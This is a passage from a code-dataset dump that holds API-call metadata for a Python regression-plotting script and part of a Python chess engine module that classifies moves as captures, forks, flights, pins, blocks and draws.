"line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 7, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 35, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 37, "usage_type": "call"}, {"api_name": "seaborn.pairplot", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.corrcoef", "line_number": 43, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 44, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "utils.ml_utils.standardize", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 65, "usage_type": "call"}, {"api_name": "algorithms.linear_regression_gd.LinearRegressionGD", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.ml_utils.standardize", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 129, "usage_type": "call"}, {"api_name": "sklearn.linear_model.RANSACRegressor", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 142, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.plot", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 159, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 162, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 164, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 170, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 190, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 191, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 194, "usage_type": 
"call"}, {"api_name": "numpy.transpose", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 205, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 207, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 210, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 216, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 220, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 224, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "pdb.set_trace", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 265, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", 
"line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 278, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 281, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 292, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 294, "usage_type": "call"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 300, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 300, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 303, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 311, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 312, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 314, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 315, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 324, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 324, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", 
"line_number": 335, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 335, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 337, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 337, "usage_type": "name"}]}
+{"seq_id": "2094413798", "text": "from operator import attrgetter\nimport copy\nfrom .values import *\nfrom .match import *\nfrom .move import *\nfrom .helper import reverse_lookup\nfrom .analyze_helper import *\nfrom .pieces.pawn import cPawn\nfrom .pieces.knight import cKnight\nfrom .pieces.bishop import cBishop\nfrom .pieces.rook import cRook\nfrom .pieces.king import cKing\nfrom .pieces.queen import cQueen\nfrom .pieces.piece import cTouch\nfrom .pieces.pieces_helper import obj_for_piece\nfrom .generator import cGenerator\n\n\ndef castles(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wKg'] or piece == PIECES['bKg']):\n if(gmove.srcx - gmove.dstx == 2 or gmove.srcx - gmove.dstx == -2):\n return True\n\n\ndef promotes(gmove):\n if(gmove.prom_piece != PIECES['blk']):\n return True\n\n\ndef captures(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n dstpiece = match.readfield(gmove.dstx, gmove.dsty)\n if(dstpiece != PIECES['blk']):\n return True\n elif( (piece == PIECES['wPw'] or piece == PIECES['bPw']) and gmove.srcx != gmove.dstx ):\n return True\n else:\n return False\n\n\ndef defends_fork(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n is_fork_defend = cpiece.defends_fork()\n else:\n is_fork_defend = False\n match.undo_move()\n return is_fork_defend\n\n\ndef threatens_fork(gmove):\n is_fork_threat = False\n match = gmove.match\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n piece = match.readfield(gmove.dstx, gmove.dsty)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n is_fork_threat = cpiece.threatens_fork()\n match.undo_move()\n return is_fork_threat\n\n\ndef flees(gmove):\n match = gmove.match\n lower_enmy_cnt_old = 0\n lower_enmy_cnt_new = 0\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wKg'] or piece == PIECES['bKg']):\n return False\n\n frdlytouches_old, enmytouches_old = list_all_field_touches(match, color, gmove.srcx, gmove.srcy)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n frdlytouches_new, enmytouches_new = list_all_field_touches(match, color, gmove.dstx, gmove.dsty)\n match.undo_move()\n ###\n\n if(len(enmytouches_old) > 0 and \n (len(frdlytouches_old) < len(frdlytouches_new))):\n return True\n\n if(len(enmytouches_old) > len(enmytouches_new)):\n return True\n\n for enmy in enmytouches_old:\n if(PIECES_RANK[enmy.piece] < PIECES_RANK[piece]):\n lower_enmy_cnt_old += 1\n for enmy in enmytouches_new:\n if(PIECES_RANK[enmy.piece] < PIECES_RANK[piece]):\n lower_enmy_cnt_new += 1\n if(lower_enmy_cnt_old > lower_enmy_cnt_new):\n return True\n else:\n return False\n\n\ndef find_attacks_and_supports_after_move(gmove):\n attacked = []\n supported = []\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n cpiece.find_attacks_and_supports(attacked, supported)\n \n if(cpiece.piece == PIECES['wKg'] or cpiece.piece == PIECES['bKg']):\n if(gmove.srcx - gmove.dstx == -2):\n 
crook = cRook(match, gmove.dstx - 1, gmove.dsty)\n crook.find_attacks_and_supports(attacked, supported)\n elif(gmove.srcx - gmove.dstx == 2):\n crook = cRook(match, gmove.dstx + 1, gmove.dsty)\n crook.find_attacks_and_supports(attacked, supported)\n match.undo_move()\n ###\n return attacked, supported\n\n\ndef find_attacks_on_and_supports_of_dstfield_after_move(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n frdlytouches, enmytouches = list_all_field_touches(match, match.color_of_piece(piece), gmove.dstx, gmove.dsty)\n match.undo_move()\n return frdlytouches, enmytouches\n\n\ndef does_unpin(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n pinlines_before = search_lines_of_pin(match, color, gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n pinlines_after = search_lines_of_pin(match, color, gmove.dstx, gmove.dsty, None, None)\n match.undo_move()\n ###\n if(len(pinlines_after) < len(pinlines_before)):\n return True\n for pbefore in pinlines_before:\n identical = False\n for pafter in pinlines_after:\n if(pbefore[0].fieldx == pafter[0].fieldx and pbefore[0].fieldy == pafter[0].fieldy):\n identical = True\n if(identical == False):\n return True\n return False\n\n\ndef defends_check(match):\n if(match.next_color() == COLORS['white']):\n cking = cKing(match, match.board.wKg_x, match.board.wKg_y)\n else:\n cking = cKing(match, match.board.bKg_x, match.board.bKg_y)\n return cking.is_attacked()\n\n\ndef check_mates(gmove):\n match = gmove.match\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n is_move_available = match.is_move_available()\n match.undo_move()\n return not is_move_available\n\n\ndef find_disclosed_pieces(match, srcx, srcy, dstx, dsty, discl_attacked, discl_supported):\n piece = match.readfield(srcx, srcy)\n color = match.color_of_piece(piece)\n idx = 0\n for step in cQueen.STEPS:\n if(idx % 2 == 0):\n first = cTouch(PIECES['blk'], 0, 0)\n second = cTouch(PIECES['blk'], 0, 0)\n if(idx < 4):\n cpiece = cRook\n excluded_dir = cRook.dir_for_move(srcx, srcy, dstx, dsty)\n faces = [PIECES['wRk'], PIECES['bRk'], PIECES['wQu'], PIECES['bQu']]\n else:\n cpiece = cBishop\n excluded_dir = cBishop.dir_for_move(srcx, srcy, dstx, dsty)\n faces = [PIECES['wBp'], PIECES['bBp'], PIECES['wQu'], PIECES['bQu']]\n idx += 1\n\n stepx = step[0]\n stepy = step[1]\n direction = cpiece.dir_for_move(srcx, srcy, (srcx + stepx), (srcy + stepy))\n if(direction == excluded_dir or direction == match.REVERSE_DIRS[excluded_dir]):\n break\n x1, y1 = match.search(srcx, srcy, stepx, stepy)\n if(x1 is not None):\n piece = match.readfield(x1, y1)\n if(first.piece == PIECES['blk']):\n first.piece = piece\n first.fieldx = x1\n first.fieldy = y1\n continue\n elif(second.piece == PIECES['blk']):\n second.piece = piece\n second.fieldx = x1\n second.fieldy = y1\n\n if(first.piece == PIECES['blk'] or second.piece == PIECES['blk']):\n continue\n \n if(match.color_of_piece(first.piece) != match.color_of_piece(second.piece)):\n if(match.color_of_piece(first.piece) == color):\n for face in faces:\n if(first.piece == face):\n discl_attacked.append(second)\n break\n else:\n for face in faces:\n if(second.piece == face):\n discl_attacked.append(first)\n break\n elif(match.color_of_piece(first.piece) == 
match.color_of_piece(second.piece)):\n if(match.color_of_piece(first.piece) == color):\n for face in faces:\n if(first.piece == face):\n discl_supported.append(second)\n break\n for face in faces:\n if(second.piece == face):\n discl_supported.append(first)\n break\n\ndef find_disclosures(match, gmove):\n discl_attacked = []\n discl_supported = []\n\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n find_disclosed_pieces(match, gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, discl_attacked, discl_supported)\n match.undo_move()\n ###\n match.writefield(gmove.srcx, gmove.srcy, PIECES['blk'])\n\n for ctouch_beyond in discl_attacked:\n list_field_touches_beyond(match, color, ctouch_beyond)\n\n for ctouch_beyond in discl_supported:\n list_field_touches_beyond(match, color, ctouch_beyond)\n\n match.writefield(gmove.srcx, gmove.srcy, piece)\n ###\n \n return discl_attacked, discl_supported\n\n\ndef blocks(gmove):\n STEPS = [ [0, 1], [1, 0], [1, 1], [-1, 1] ]\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n #frdlytouches_before_count = 0\n enmytouches_before_count = 0\n #frdlytouches_after_count = 0\n enmytouches_after_count = 0\n\n for step in STEPS:\n stepx = step[0]\n stepy = step[1]\n x1, y1, x2, y2 = match.search_bi_dirs(gmove.dstx, gmove.dsty, stepx, stepy)\n if(x1 is not None):\n if((x1 == gmove.srcx and y1 == gmove.srcy) or\n (x2 == gmove.srcx and y2 == gmove.srcy)):\n continue\n piece1 = match.readfield(x1, y1)\n piece2 = match.readfield(x2, y2)\n if(match.color_of_piece(piece1) == match.color_of_piece(piece2)):\n continue\n if(match.color_of_piece(piece1) == color):\n frdlytouches, enmytouches = list_all_field_touches(match, color, x1, y1)\n else:\n frdlytouches, enmytouches = list_all_field_touches(match, color, x2, y2)\n enmytouches_before_count += len(enmytouches)\n\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n\n for step in STEPS:\n stepx = step[0]\n stepy = step[1]\n x1, y1, x2, y2 = match.search_bi_dirs(gmove.dstx, gmove.dsty, stepx, stepy)\n if(x1 is not None):\n if((x1 == gmove.srcx and y1 == gmove.srcy) or\n (x2 == gmove.srcx and y2 == gmove.srcy)):\n continue\n piece1 = match.readfield(x1, y1)\n piece2 = match.readfield(x2, y2)\n if(match.color_of_piece(piece1) == match.color_of_piece(piece2)):\n continue\n if(match.color_of_piece(piece1) == color):\n frdlytouches, enmytouches = list_all_field_touches(match, color, x1, y1)\n else:\n frdlytouches, enmytouches = list_all_field_touches(match, color, x2, y2)\n enmytouches_after_count += len(enmytouches)\n\n match.undo_move()\n\n if(enmytouches_after_count < enmytouches_before_count):\n return True\n else:\n return False\n\n\ndef running_pawn_in_endgame(gmove):\n if(gmove.match.is_endgame()):\n piece = gmove.match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wPw'] or piece == PIECES['bPw']):\n cpawn = cPawn(gmove.match, gmove.srcx, gmove.srcy)\n return cpawn.is_running()\n return False\n\n\ndef defends_invasion(match, gmove):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n board = [[0] * 8 for i in range(8)]\n\n for y in range(8):\n for x in range(8):\n piece = match.readfield(x, y)\n if(match.color_of_piece(piece) == COLORS['white']):\n board[y][x] += 1\n elif(match.color_of_piece(piece) == COLORS['black']):\n board[y][x] -= 1\n \n return False\n\ndef 
controles_file(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n\n if(piece == PIECES['wBp'] or piece == PIECES['bBp']):\n cbishop = cBishop(match, gmove.srcx, gmove.srcy)\n return cbishop.move_controles_file(gmove.dstx, gmove.dsty)\n elif(piece == PIECES['wRk'] or piece == PIECES['bRk']):\n crook = cRook(match, gmove.srcx, gmove.srcy)\n return crook.move_controles_file(gmove.dstx, gmove.dsty)\n elif(piece == PIECES['wQu'] or piece == PIECES['bQu']):\n cqueen = cQueen(match, gmove.srcx, gmove.srcy)\n return cqueen.move_controles_file(gmove.dstx, gmove.dsty)\n else:\n return False\n\ndef is_tactical_draw(gmove):\n newmatch = copy.deepcopy(gmove.match)\n newmatch.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n\n #if(newmatch.board.fifty_moves_count >= 49):\n #return True\n\n if(len(newmatch.move_list) < 9):\n return False\n\n boards = []\n for i in range(9):\n str_board = \"\"\n for y in range(8):\n for x in range(8):\n piece = newmatch.readfield(x, y)\n str_board += reverse_lookup(PIECES, piece)\n boards.append(str_board)\n newmatch.undo_move()\n\n count = 0\n str_board = boards[0]\n for i in range(1, 9):\n if(boards[i] == str_board):\n count += 1\n\n return count >= 2\n\n\ndef is_progress(gmove):\n match = gmove.match\n if(match.is_opening()):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wPw']):\n if(gmove.srcy == match.board.COORD['2'] and \n gmove.srcx >= match.board.COORD['3'] and gmove.srcx <= match.board.COORD['6']):\n return True\n elif(piece == PIECES['bPw']):\n if(gmove.srcy == 